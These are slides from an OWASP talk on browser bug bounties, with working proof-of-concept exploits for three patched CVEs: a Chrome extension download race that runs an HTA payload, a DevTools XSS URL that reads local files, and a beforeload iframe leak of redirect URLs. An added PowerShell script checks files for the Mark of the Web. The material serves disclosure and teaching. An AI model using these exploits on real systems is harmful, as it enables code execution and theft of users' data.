Hunting for Bounties in a Web Browser

OWASP Helsinki #35

Juho Nurminen

2018-11-06

Who?

Specialist @ 2NS

Hacking browsers since ~2011

A whole bunch of VRPs

Why web browsers?

Complex software + Huge attack surface + Open Source + Excellently managed VRPs + Better-than-average rewards + Real impact

= Fierce competition, but enough bugs for everyone

The approach

Understand the tech

Knowing web technologies and JavaScript helps

As does knowing extension and plugin APIs

Also browser DevTools, W3C standards, PDF, Flash, NaCl, WebAssembly, ...

Focus on what you know

Stay on top of things

https://crbug.com/

https://bugzilla.mozilla.org/

https://www.chromestatus.com/features

https://mdn.io/

Read up on prior art

What's already been looked at? What hasn't?

What's already been fixed? Are the fixes good enough?

Has a bug been reopened repeatedly?

Can you repro an old bug in some other context?

Or, idk, maybe just write something for ClusterFuzz

¯\_(ツ)_/¯

Bugs, bugs, bugs

CVE-2018-6033

Extension code can open (and thereby execute) files it has just downloaded via chrome.downloads.open()

Race condition in the anti-malware hook that checks a completed download and applies the Mark of the Web

⇒ No MOTW on the file ⇒ No OS or browser warnings when it is opened

⇒ Full RCE + SBX (sandbox escape) in Chrome ≤ 63

CVE-2018-6033

// Background script of an extension with the "downloads" and "downloads.open"
// permissions (chrome.downloads.open() requires both).
chrome.browserAction.onClicked.addListener(tab => {
  var downloadId;

  // 1. Download a harmless, empty file as shell.hta. This is the download that
  //    the anti-malware hook checks, and whose id is opened later.
  chrome.downloads.download({
    url: "data:,",
    filename: "shell.hta",
    conflictAction: "overwrite"
  }, id => downloadId = id);

  // 2. Immediately overwrite the same path with the real payload: an HTA that
  //    spawns calc through WScript.Shell. The trailing HTML comment is padding;
  //    the slide used a long literal run of '-' characters, reproduced here with
  //    repeat() of comparable length so the string literal stays on one line.
  var payload = "<script>(new ActiveXObject('WScript.shell')).run('calc')</script>"
              + "<!--" + "-".repeat(6000) + "-->";
  chrome.downloads.download({
    url: "data:," + payload,
    filename: "shell.hta",
    conflictAction: "overwrite"
  });

  // 3. Open the *first* download by id. Its path now holds the payload, which
  //    never received the Mark of the Web, so mshta runs it with no warning.
  setTimeout(_ => chrome.downloads.open(downloadId), 500);
});
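The "No MOTW" step above can be verified on the receiving end. The following PowerShell function is an added example, not code from the talk: it reports whether a downloaded file carries the Zone.Identifier alternate data stream and, if so, which zone and source URLs the browser recorded. It assumes an NTFS volume and PowerShell 3 or later (the -Stream parameter); the path in the usage line is a placeholder.

```powershell
# Added example, not part of the talk: check a downloaded file for the Mark of the Web.
# Assumes an NTFS volume and PowerShell 3+ (Get-Item/Get-Content -Stream).
function Test-MarkOfTheWeb {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Path)

    # Enumerate all NTFS alternate data streams on the file. An unmarked file
    # exposes only the unnamed ':$DATA' stream.
    $streams = Get-Item -LiteralPath $Path -Stream * -ErrorAction Stop |
               Select-Object -ExpandProperty Stream

    if ($streams -notcontains 'Zone.Identifier') {
        return [pscustomobject]@{ Path = $Path; Marked = $false; ZoneId = $null; ReferrerUrl = $null; HostUrl = $null }
    }

    # Zone.Identifier is a small INI fragment:
    #   [ZoneTransfer]
    #   ZoneId=3            (0 Local, 1 Intranet, 2 Trusted, 3 Internet, 4 Restricted)
    #   ReferrerUrl=...     (written by Chrome and other modern browsers)
    #   HostUrl=...
    $zoneId = $null; $referrer = $null; $hostUrl = $null
    foreach ($line in (Get-Content -LiteralPath $Path -Stream Zone.Identifier)) {
        if     ($line -match '^ZoneId=(\d+)\s*$')  { $zoneId   = [int]$Matches[1] }
        elseif ($line -match '^ReferrerUrl=(.*)$') { $referrer = $Matches[1] }
        elseif ($line -match '^HostUrl=(.*)$')     { $hostUrl  = $Matches[1] }
    }

    [pscustomobject]@{ Path = $Path; Marked = $true; ZoneId = $zoneId; ReferrerUrl = $referrer; HostUrl = $hostUrl }
}

# Usage (placeholder path): a file Chrome fetched from the Internet should report
# Marked=True and ZoneId=3. A freshly downloaded file reporting Marked=False is
# exactly the state CVE-2018-6033 produced, and the reason mshta ran it unprompted.
Test-MarkOfTheWeb -Path "$env:USERPROFILE\Downloads\shell.hta" | Format-List
```

Run it against a file right after the download finishes; ZoneId 3 (Internet) is what triggers the SmartScreen and "This file came from another computer" prompts that the race suppresses.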

CVE-2018-6039

XSS in the DevTools frontend via the remoteFrontendUrl query parameter

The frontend's privileged DevToolsAPI methods can be overwritten by the injected script

⇒ Remote filesystem access (reads of file:/// URLs) in Chrome ≤ 63

CVE-2018-6039

chrome-devtools://devtools/remote/serve_rev/@199588/devtools.html?remoteFrontendUrl=javascript:w=open("devtools.html");w.onload=_=>w.eval(`DevToolsAPI.streamWrite=(e,o)=>document.write(o);DevToolsAPI.sendMessageToEmbedder("loadNetworkResource",["file:///C:/","",0]);`)

The javascript: payload carried in remoteFrontendUrl, unfolded:

// Open a second DevTools frontend; it is same-origin, so its globals are reachable.
w = open("devtools.html");
w.onload = _ => w.eval(`
    // Redirect the embedder's stream callback (id, chunk) into the document, so
    // whatever the browser reads on the frontend's behalf is written into the page.
    DevToolsAPI.streamWrite = (e,o) => document.write(o);
    // Ask the privileged embedder to load a file:// URL into stream id 0;
    // the directory listing of C:\ ends up in the page.
    DevToolsAPI.sendMessageToEmbedder(
      "loadNetworkResource", [ "file:///C:/", "", 0]);
  `)

CVE-2011-2800

WebKit's 'beforeload' event leaks data across origins

The event fires on an <iframe> for every navigation inside it, so a malicious page can read the target of any redirection in a frame from event.url

⇒ Authentication tokens and usernames carried in redirect URLs exposed in Chrome ≤ 13

⇒ Also Safari < 5.1.1 (OS X, Windows), iOS < 5, ...

CVE-2011-2800

<!-- Frame 1: a client-side redirector. The frame navigates to the URL given in the
     #continue fragment, and the parent page sees that target in event.url. -->
<iframe
  src="http://ssl.gstatic.com/chrome/webstore/html/bounce.html#continue=https%3A%2F%2Fchrome.google.com%2Fwebstore%2F"
  onbeforeload="alert('Now opening ' + event.url)">
</iframe>
<!-- Frame 2: facebook.com/me redirects to the logged-in user's own profile URL,
     so event.url leaks their username to this unrelated origin. -->
<iframe
  src="https://www.facebook.com/me"
  onbeforeload="alert('Now opening ' + event.url)">
</iframe>

Summary

1. Pwn things

2. Post on crbug.com/new

4. Profit

That's it, thanks :)